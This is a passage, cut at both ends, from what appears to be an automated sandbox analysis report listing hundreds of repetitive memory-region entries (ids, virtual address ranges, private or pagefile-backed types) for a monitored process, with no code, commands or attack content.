name = "pagefile_0x0000000000540000" filename = "" Region: id = 23335 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23336 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23337 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23338 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23339 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23340 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23341 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23342 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23343 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23344 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23345 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23346 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23347 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23348 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23349 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23350 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23351 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23352 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23353 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23354 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23355 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23356 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23357 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23358 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23359 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23360 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23361 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23362 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23363 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23364 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23365 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23366 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23367 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23368 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23369 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23370 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23371 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23372 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23373 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23374 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23375 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23376 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23377 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23378 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23379 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23380 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23381 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23382 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23383 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23384 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23385 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23386 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23387 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23388 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23389 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23390 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23391 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23392 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23393 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23394 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23395 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23396 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23397 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23398 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23399 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23400 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23401 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23402 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23403 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23404 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23405 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23406 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23407 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23408 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23409 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23410 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23411 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23412 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23413 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23414 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23415 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23416 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23417 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23418 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23419 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23420 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23421 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23422 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23423 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23424 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23425 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23426 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23427 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23428 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23429 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23430 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23431 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23432 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23433 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23434 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23435 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23436 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23437 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23438 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23439 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23440 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23441 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23442 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23443 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23444 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23445 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23446 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23447 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23448 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23449 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23450 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23451 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23452 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23454 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23455 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23456 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23457 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23458 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23459 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23460 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23461 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23462 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23463 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23464 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23465 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23466 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23467 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23468 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23469 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23470 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23471 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23472 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23473 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23474 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23475 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23476 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23477 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23478 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23479 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23480 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23481 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23482 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23483 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23484 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23485 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23486 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23487 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23488 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23489 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23490 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23491 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23492 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23493 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23494 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23495 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23496 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23497 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23498 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23499 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23500 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23501 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23502 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23503 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23504 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23505 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23506 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23507 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23508 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23509 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23510 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23511 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23512 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23513 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23514 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23515 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23516 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23517 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23518 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23519 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23520 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23521 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23522 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23523 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23524 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23525 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23526 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23527 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23528 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23529 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23530 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23531 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23532 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23533 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23534 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23535 start_va = 0x540000 end_va = 0x54efff 